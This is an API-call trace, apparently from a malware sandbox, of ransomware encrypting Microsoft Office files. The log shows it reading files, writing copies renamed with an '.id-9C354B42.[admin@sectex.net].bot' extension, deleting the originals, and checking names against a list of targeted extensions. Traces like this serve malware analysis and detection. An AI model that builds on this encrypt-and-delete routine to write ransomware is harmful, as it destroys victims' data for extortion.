	[0164.590] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.590] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0164.590] SetEndOfFile (hFile=0x3ac) returned 1
	[0165.567] CloseHandle (hObject=0x3ac) returned 1
	[0165.567] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.567] SetEndOfFile (hFile=0x37c) returned 1
	[0165.784] CloseHandle (hObject=0x37c) returned 1
	[0165.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0165.893] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico")) returned 1
	[0165.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.911] lstrlenW (lpString=".doc") returned 4
	[0165.911] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0165.911] lstrlenW (lpString=".docx") returned 5
	[0165.911] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0165.911] lstrlenW (lpString=".pdf") returned 4
	[0165.911] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0165.911] lstrlenW (lpString=".xls") returned 4
	[0165.911] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0165.911] lstrlenW (lpString=".xlsx") returned 5
	[0165.911] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0165.911] lstrlenW (lpString=".ppt") returned 4
	[0165.911] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0165.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.911] lstrlenW (lpString=".zip") returned 4
	[0165.911] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0165.911] lstrlenW (lpString=".rar") returned 4
	[0165.911] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0165.911] lstrlenW (lpString=".bz2") returned 4
	[0165.911] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0165.911] lstrlenW (lpString=".7z") returned 3
	[0165.911] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0165.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.911] lstrlenW (lpString=".dbf") returned 4
	[0165.911] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString=".1cd") returned 4
	[0165.912] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString=".jpg") returned 4
	[0165.912] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString=".doc") returned 4
	[0165.912] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0165.912] lstrlenW (lpString=".docx") returned 5
	[0165.912] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0165.912] lstrlenW (lpString=".pdf") returned 4
	[0165.912] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0165.912] lstrlenW (lpString=".xls") returned 4
	[0165.912] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0165.912] lstrlenW (lpString=".xlsx") returned 5
	[0165.912] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0165.912] lstrlenW (lpString=".ppt") returned 4
	[0165.912] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString=".zip") returned 4
	[0165.912] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0165.912] lstrlenW (lpString=".rar") returned 4
	[0165.912] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0165.912] lstrlenW (lpString=".bz2") returned 4
	[0165.912] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0165.912] lstrlenW (lpString=".7z") returned 3
	[0165.912] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString=".dbf") returned 4
	[0165.912] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0165.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.912] lstrlenW (lpString=".1cd") returned 4
	[0165.913] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0165.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO") returned 62
	[0165.913] lstrlenW (lpString=".jpg") returned 4
	[0165.913] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0165.913] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0165.913] lstrlenW (lpString="TASKACCL.ICO") returned 12
	[0165.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0165.916] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1078) returned 1
	[0165.916] CloseHandle (hObject=0x3b8) returned 1
	[0165.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico")) returned 0x20
	[0165.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0165.922] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.922] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0168.741] GetLastError () returned 0x0
	[0168.741] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x436, lpOverlapped=0x0) returned 1
	[0168.744] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0168.745] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.745] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.745] SetEndOfFile (hFile=0x1d8) returned 1
	[0168.745] CloseHandle (hObject=0x1d8) returned 1
	[0168.745] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.745] SetEndOfFile (hFile=0x3f0) returned 1
	[0168.747] CloseHandle (hObject=0x3f0) returned 1
	[0168.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.748] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico")) returned 1
	[0168.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.748] lstrlenW (lpString=".doc") returned 4
	[0168.748] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.748] lstrlenW (lpString=".docx") returned 5
	[0168.748] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.748] lstrlenW (lpString=".pdf") returned 4
	[0168.749] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString=".xls") returned 4
	[0168.749] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString=".xlsx") returned 5
	[0168.749] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.749] lstrlenW (lpString=".ppt") returned 4
	[0168.749] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.749] lstrlenW (lpString=".zip") returned 4
	[0168.749] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString=".rar") returned 4
	[0168.749] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString=".bz2") returned 4
	[0168.749] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.749] lstrlenW (lpString=".7z") returned 3
	[0168.749] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.749] lstrlenW (lpString=".dbf") returned 4
	[0168.749] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.749] lstrlenW (lpString=".1cd") returned 4
	[0168.749] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.749] lstrlenW (lpString=".jpg") returned 4
	[0168.749] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.749] lstrlenW (lpString=".doc") returned 4
	[0168.749] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.749] lstrlenW (lpString=".docx") returned 5
	[0168.749] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.749] lstrlenW (lpString=".pdf") returned 4
	[0168.749] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.749] lstrlenW (lpString=".xls") returned 4
	[0168.750] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.750] lstrlenW (lpString=".xlsx") returned 5
	[0168.750] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.750] lstrlenW (lpString=".ppt") returned 4
	[0168.750] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.750] lstrlenW (lpString=".zip") returned 4
	[0168.750] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.750] lstrlenW (lpString=".rar") returned 4
	[0168.750] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.750] lstrlenW (lpString=".bz2") returned 4
	[0168.750] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.750] lstrlenW (lpString=".7z") returned 3
	[0168.750] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.750] lstrlenW (lpString=".dbf") returned 4
	[0168.750] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.750] lstrlenW (lpString=".1cd") returned 4
	[0168.750] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO") returned 66
	[0168.750] lstrlenW (lpString=".jpg") returned 4
	[0168.750] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.750] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0168.750] lstrlenW (lpString="TASKUPD.CFG") returned 11
	[0168.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0168.751] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=806) returned 1
	[0168.751] CloseHandle (hObject=0x3f0) returned 1
	[0168.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg")) returned 0x20
	[0168.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0168.751] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.751] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0168.752] GetLastError () returned 0x0
	[0168.752] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x326, lpOverlapped=0x0) returned 1
	[0168.753] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x330, lpOverlapped=0x0) returned 1
	[0168.754] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.754] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0168.755] SetEndOfFile (hFile=0x1d8) returned 1
	[0168.755] CloseHandle (hObject=0x1d8) returned 1
	[0168.755] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.755] SetEndOfFile (hFile=0x3f0) returned 1
	[0168.757] CloseHandle (hObject=0x3f0) returned 1
	[0168.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.757] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg")) returned 1
	[0168.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.758] lstrlenW (lpString=".doc") returned 4
	[0168.758] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString=".docx") returned 5
	[0168.758] lstrcmpiW (lpString1=".docx", lpString2="D.CFG") returned -1
	[0168.758] lstrlenW (lpString=".pdf") returned 4
	[0168.758] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString=".xls") returned 4
	[0168.758] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString=".xlsx") returned 5
	[0168.758] lstrcmpiW (lpString1=".xlsx", lpString2="D.CFG") returned -1
	[0168.758] lstrlenW (lpString=".ppt") returned 4
	[0168.758] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.758] lstrlenW (lpString=".zip") returned 4
	[0168.758] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString=".rar") returned 4
	[0168.758] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString=".bz2") returned 4
	[0168.758] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.758] lstrlenW (lpString=".7z") returned 3
	[0168.758] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.758] lstrlenW (lpString=".dbf") returned 4
	[0168.758] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.758] lstrlenW (lpString=".1cd") returned 4
	[0168.758] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.759] lstrlenW (lpString=".jpg") returned 4
	[0168.759] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.759] lstrlenW (lpString=".doc") returned 4
	[0168.759] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString=".docx") returned 5
	[0168.759] lstrcmpiW (lpString1=".docx", lpString2="D.CFG") returned -1
	[0168.759] lstrlenW (lpString=".pdf") returned 4
	[0168.759] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString=".xls") returned 4
	[0168.759] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString=".xlsx") returned 5
	[0168.759] lstrcmpiW (lpString1=".xlsx", lpString2="D.CFG") returned -1
	[0168.759] lstrlenW (lpString=".ppt") returned 4
	[0168.759] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.759] lstrlenW (lpString=".zip") returned 4
	[0168.759] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString=".rar") returned 4
	[0168.759] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString=".bz2") returned 4
	[0168.759] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.759] lstrlenW (lpString=".7z") returned 3
	[0168.759] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.759] lstrlenW (lpString=".dbf") returned 4
	[0168.759] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.759] lstrlenW (lpString=".1cd") returned 4
	[0168.759] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG") returned 65
	[0168.760] lstrlenW (lpString=".jpg") returned 4
	[0168.760] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.760] lstrcmpiW (lpString1=".LNG", lpString2=".bot") returned 1
	[0168.760] lstrlenW (lpString="FRENCH.LNG") returned 10
	[0168.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0168.760] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=559411) returned 1
	[0168.760] CloseHandle (hObject=0x3f0) returned 1
	[0168.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng")) returned 0x20
	[0168.761] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0168.762] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.762] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0168.762] GetLastError () returned 0x0
	[0168.762] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x88933, lpOverlapped=0x0) returned 1
	[0169.055] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x88940, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x88940, lpOverlapped=0x0) returned 1
	[0169.067] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
